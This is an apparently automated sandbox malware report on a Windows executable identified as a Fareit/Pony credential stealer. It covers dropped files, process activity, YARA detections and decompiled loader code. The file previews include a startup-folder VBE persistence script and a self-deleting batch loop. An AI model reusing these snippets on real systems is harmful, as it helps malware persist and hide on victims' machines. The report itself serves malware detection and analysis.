                                                                      Number of analysed new started processes analysed:22
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.troj.spyw.evad.winEXE@16/4@0/1
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 84.4% (good quality ratio 83.3%)
                                                                      • Quality average: 90.2%
                                                                      • Quality standard deviation: 19.5%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 187
                                                                      • Number of non-executed functions: 113
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 40.127.240.158, 20.49.150.241, 20.82.210.154, 95.100.218.79, 104.94.89.6, 20.50.102.62, 20.54.110.249, 40.112.88.60, 8.247.248.223, 8.247.248.249, 8.247.244.249
                                                                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      Time | Type | Description
                                                                      05:19:06 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASN

                                                                      No context

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\12537875.bat
                                                                      Process:C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):94
                                                                      Entropy (8bit):3.233204299824007
                                                                      Encrypted:false
                                                                      SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                                                      MD5:3880EEB1C736D853EB13B44898B718AB
                                                                      SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                                                      SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                                                      SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview: ......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
                                                                      C:\Users\user\AppData\Local\Temp\12556453.bat
                                                                      Process:C:\Users\user\AppData\Roaming\Adnexal8.exe
                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):94
                                                                      Entropy (8bit):3.233204299824007
                                                                      Encrypted:false
                                                                      SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                                                      MD5:3880EEB1C736D853EB13B44898B718AB
                                                                      SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                                                      SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                                                      SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview: ......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
                                                                      C:\Users\user\AppData\Roaming\Adnexal8.exe
                                                                      Process:C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):147456
                                                                      Entropy (8bit):6.863912238907148
                                                                      Encrypted:false
                                                                      SSDEEP:3072:dzTpvZP5c5VcVkyIqSq3FZ/CPvBUk+2icuOHBSKwVLkIPbxWL:dzTpTcfktVZ/eBJFhuIoKWc
                                                                      MD5:CEA30515CD73B348562CA2ABE1E4D47C
                                                                      SHA1:992044BCEB5EFCDE49D301ADE4009821416E2F14
                                                                      SHA-256:D100E2DEEDEE23CAAFD62A4818E09A817C5D8541873735043D3660D01EE3189A
                                                                      SHA-512:D2F58477D9F54BDF333D38180E6EEBDDD3AF527D48539B6EF4E64357A9ED47DB1BCF6051EBD28953B4D29A01482644F6212E248B4CE52535861542D2B4ABFA33
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: Metadefender, Detection: 73%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 90%
                                                                      Reputation:low
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe
                                                                      Process:C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):384
                                                                      Entropy (8bit):2.6619394252288306
                                                                      Encrypted:false
                                                                      SSDEEP:3:j+qAHmFEm86oQ/FERMQsNC2xAvOt+kiEaKC5dgdLHBHLHrLL:j+q9Nht6GzwknaZ5dM
                                                                      MD5:F40096CD6C6B446A9B937443895ED424
                                                                      SHA1:6B3E5F5521DFF346F98755F8AFA5EAF905670034
                                                                      SHA-256:D61FFAE8EBE85E8D7F9C137D3432CF3D50490A1B600F511612476F6B39F1BEAA
                                                                      SHA-512:D26CF75FFADF0F15D6D0B88F09BC74067E640D390C48567882DD00B317CE2634AA0600C2D27D41C072D2C1758B11C1AEFABF06368BBB583E91A48ACD67B40253
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: Set objShell = CreateObject("Shell.Application")..objShell.ShellExecute "C:\Users\user\AppData\Roaming\Adnexal8." & "exe", "", "", "", 1

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.863909587118569
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      File size:147456
                                                                      MD5:3087b67577a90aa611436c94ed23ae5a
                                                                      SHA1:6a84f2dd65787b2f9041421357c9939c63dd796d
                                                                      SHA256:2cec15c8fef9435abd5c332486d8ad7083eeb9eb84de9077b5bf6bb42458dba5
                                                                      SHA512:f962d8c030c0185ba33e2a9ebeda782a8b794307712b408a9966a679cabc457cd79b65ce06e5608788cf7011d0f14d31dd53dd9eef5dbb846b5960f5211d72cc
                                                                      SSDEEP:3072:IzTpvZP5c5VcVkyIqSq3FZ/CPvBUk+2icuOHBSKwVLkIPbxWu:IzTpTcfktVZ/eBJFhuIoKWc

                                                                      File Icon

                                                                      Icon Hash:20047c7c70f0e004

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401188
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x59D68C7D [Thu Oct 5 19:48:13 2017 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:864db8a731b1823c994bef60988e95f0

                                                                      Entrypoint Preview

                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      dec edi
                                                                      add dword ptr [eax], eax
                                                                      add byte ptr [ebx+00h], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], cl
                                                                      add byte ptr [ecx+72h], al
                                                                      jne 00007FC3D0C0ADE9h
                                                                      imul esp, dword ptr [ebp+72h], 010D0073h
                                                                      push es
                                                                      add byte ptr [eax+65h], cl
                                                                      jc 00007FC3D0C0ADE6h
                                                                      jnc 00007FC3D0C0ADB2h

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x21a74          0x28          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2b000          0x9a0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x228            0x20
IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x94          .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text  0x1000           0x20d4c       0x21000   False     0.798783735795   data       7.22855725445  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data  0x22000          0x8848        0x1000    False     0.00634765625    data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  0x2b000          0x9a0         0x1000    False     0.1884765625     data       2.14548366324  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size   Type                  Language  Country
RT_ICON        0x2b870  0x130  data
RT_ICON        0x2b588  0x2e8  data
RT_ICON        0x2b460  0x128  GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0x2b430  0x30   data
RT_VERSION     0x2b150  0x2e0  data                  English   United States

Imports

DLL           Import
MSVBVM60.DLL  _CIcos, _adj_fptan, __vbaFreeVar, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj

Version Infos

Description       Data
Translation       0x0409 0x04b0
LegalCopyright    Trns6
InternalName      Tohndiges5
FileVersion       1.08.0002
CompanyName       loGitech
LegalTrademarks   Rentegner0
ProductName       Doglpperne7
ProductVersion    1.08.0002
FileDescription   Taphanen3
OriginalFilename  Tohndiges5.exe

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                                      Network Behavior

                                                                      No network behavior found

                                                                      System Behavior

                                                                      General

                                                                      Start time:05:19:01
                                                                      Start date:08/10/2021
                                                                      Path:C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
                                                                      Imagebase:0x400000
                                                                      File size:147456 bytes
                                                                      MD5 hash:3087B67577A90AA611436C94ED23AE5A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Visual Basic
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      Reputation:low

                                                                      General

                                                                      Start time:05:19:03
                                                                      Start date:08/10/2021
                                                                      Path:C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
                                                                      Imagebase:0x400000
                                                                      File size:147456 bytes
                                                                      MD5 hash:3087B67577A90AA611436C94ED23AE5A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: pony, Description: Identify Pony, Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: pony, Description: Identify Pony, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      Reputation:low

                                                                      General

                                                                      Start time:05:19:06
                                                                      Start date:08/10/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:05:19:07
                                                                      Start date:08/10/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:05:19:15
                                                                      Start date:08/10/2021
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe'
                                                                      Imagebase:0x7ff75cb50000
                                                                      File size:163840 bytes
                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:05:19:16
                                                                      Start date:08/10/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Adnexal8.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\Adnexal8.exe'
                                                                      Imagebase:0x400000
                                                                      File size:147456 bytes
                                                                      MD5 hash:CEA30515CD73B348562CA2ABE1E4D47C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Visual Basic
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: pony, Description: Identify Pony, Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 73%, Metadefender, Browse
                                                                      • Detection: 90%, ReversingLabs
                                                                      Reputation:low

                                                                      General

                                                                      Start time:05:19:21
                                                                      Start date:08/10/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Adnexal8.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\Adnexal8.exe'
                                                                      Imagebase:0x400000
                                                                      File size:147456 bytes
                                                                      MD5 hash:CEA30515CD73B348562CA2ABE1E4D47C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: pony, Description: Identify Pony, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: pony, Description: Identify Pony, Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      Reputation:low

                                                                      General

                                                                      Start time:05:19:25
                                                                      Start date:08/10/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' '
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:05:19:25
                                                                      Start date:08/10/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?,04B40233,00000000,00000000,00000000,00000000,00000000,00000100), ref: 04B414D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2706961497-0
                                                                        • Opcode ID: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
                                                                        • Instruction ID: f25ec0e19e2d2b89887ae7cbb20b25812d888f0047aebd1c895d6cb9c596f3c3
                                                                        • Opcode Fuzzy Hash: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
                                                                        • Instruction Fuzzy Hash: 62314CB1D143419FDB24CF2CD8C8B65B7A0EB85224F04C2E9D5A68B2E7C234E481DB26
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtSetContextThread.NTDLL(00000000,?), ref: 04B40A15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
                                                                        • Instruction ID: 2825a5fef7da350e570dd683a7aee0dc461c6267f60794ac4052b00e2c57514e
                                                                        • Opcode Fuzzy Hash: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
                                                                        • Instruction Fuzzy Hash: DA11C821904245AFDB15BF78C54C6A97B75FFC2304F1496D5D562060A2DB20B983FB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 963a09184f9f20adaa2f6bb100399d5f92b43a481d01f298c1781eeb9e4b5093
                                                                        • Instruction ID: b79bf0daa7b395fd2c74f65ddc56addb1344f22f5f0daf82d0761349cbe124fc
                                                                        • Opcode Fuzzy Hash: 963a09184f9f20adaa2f6bb100399d5f92b43a481d01f298c1781eeb9e4b5093
                                                                        • Instruction Fuzzy Hash: EC012872951210DFEB20CF49CDC4E26B7E8FF88660F4984A9E9549B612C378FC90CA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 41%
                                                                        			E0041C2B3(void* __eax, void* __ebx, void* __esi) {
                                                                        				void* _t16;
                                                                        				void* _t18;
                                                                        				signed char _t20;
                                                                        				void* _t21;
                                                                        				void* _t22;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t24;
                                                                        				void* _t25;
                                                                        				void* _t28;
                                                                        				int _t37;
                                                                        				int _t39;
                                                                        				signed int _t40;
                                                                        				int _t41;
                                                                        				void* _t46;
                                                                        				void* _t49;
                                                                        				char* _t50;
                                                                        				signed int _t51;
                                                                        				signed int _t55;
                                                                        				void* _t62;
                                                                        
                                                                        				_pop(_t41);
                                                                        				_t37 = _t41;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				 *_t50 = 0x48;
                                                                        				asm("paddw xmm2, xmm1");
                                                                        				 *(_t50 + 1) = 0x65;
                                                                        				_push(__eax);
                                                                        				_pop(_t16);
                                                                        				 *((char*)(_t50 + 2)) = 0x61;
                                                                        				 *((char*)(_t50 + 3)) = 0x70;
                                                                        				_t18 = _t16;
                                                                        				 *((char*)(_t50 + 4)) = 0x43;
                                                                        				 *((char*)(_t50 + 5)) = 0x72;
                                                                        				_t20 = _t18;
                                                                        				 *((char*)(_t50 + 6)) = 0x65;
                                                                        				 *((char*)(_t50 + 7)) = 0x61;
                                                                        				_push(__esi);
                                                                        				_pop(_t46);
                                                                        				 *((char*)(_t50 + 8)) = 0x74;
                                                                        				_t51 = _t50 + 1;
                                                                        				_t21 = _t20 & 0x00000008;
                                                                        				if(_t21 == 0) {
                                                                        					asm("cld");
                                                                        					_pop(ds);
                                                                        					 *_t21 = _t21 +  *_t21;
                                                                        					__eflags =  *_t21;
                                                                        					_t22 = memcpy(_t21, _t46, _t37);
                                                                        					_t51 = _t51 + 0xc;
                                                                        					_t41 = _t46 + _t37 + _t37;
                                                                        					_t39 = _t37;
                                                                        					do {
                                                                        						_t22 = E0041C3C0(_t22, _t39, _t46, 0);
                                                                        					} while (__eflags >= 0);
                                                                        					goto __eax;
                                                                        				}
                                                                        				_t55 = _t21 << 1;
                                                                        				 *((char*)(_t51 + 9)) = 0x65;
                                                                        				 *(_t49 - 0x70) =  *(_t49 - 0x70) | _t51;
                                                                        				_t40 = _t51;
                                                                        				L9();
                                                                        				 *_t51 =  *_t51 + 0x44fff; // executed
                                                                        				_t28 = HeapCreate(1, 0, 0); // executed
                                                                        				 *(_t49 + 8) = _t28;
                                                                        				_t39 = _t41;
                                                                        				_t23 = L0041C326(__ebx, _t39, _t41, _t46, _t55, _t62);
                                                                        				_push(_t23);
                                                                        				_t24 = _t23 - 1;
                                                                        				asm("popad");
                                                                        				if(_t24 >= 0) {
                                                                        					asm("insb");
                                                                        					asm("insb");
                                                                        					asm("outsd");
                                                                        					asm("arpl [eax], ax");
                                                                        					do {
                                                                        						asm("lodsd");
                                                                        					} while (_t24 == 0 ||  *_t24 != 0xffffffff83ec8b55 ||  *((intOrPtr*)(_t24 + 4)) != 0xffffffff8d560cec);
                                                                        					 *_t51 =  *_t51 + 0x44ffe;
                                                                        					_t25 =  *_t24(_t51, _t39, _t40, 2, _t51, 0, 0, 0); // executed
                                                                        					return _t25;
                                                                        				}
                                                                        				return _t24;
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID: C$ZBH$a$a$e$e$e$p$r$t
                                                                        • API String ID: 10892065-806109700
                                                                        • Opcode ID: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
                                                                        • Instruction ID: 58e82dbdb3658900729ccf9ba076fd16bbbb39d88dae26d1e35245091ceddc53
                                                                        • Opcode Fuzzy Hash: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
